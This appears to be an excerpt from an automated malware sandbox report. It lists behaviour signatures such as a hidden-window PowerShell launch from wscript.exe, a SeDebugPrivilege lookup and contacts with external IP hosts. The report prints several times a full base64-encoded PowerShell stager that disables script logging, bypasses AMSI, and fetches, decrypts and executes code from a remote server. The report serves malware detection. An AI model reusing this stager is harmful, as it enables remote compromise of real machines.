KABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA==

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 4, 2024, 5:05 p.m.	show_type: 0 filepath_r: powershell parameters: -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA== filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 4, 2024, 5:05 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (2 events)

host	117.18.232.200
host	89.197.154.116

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA==
parent_process	wscript.exe				martian_process	powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBb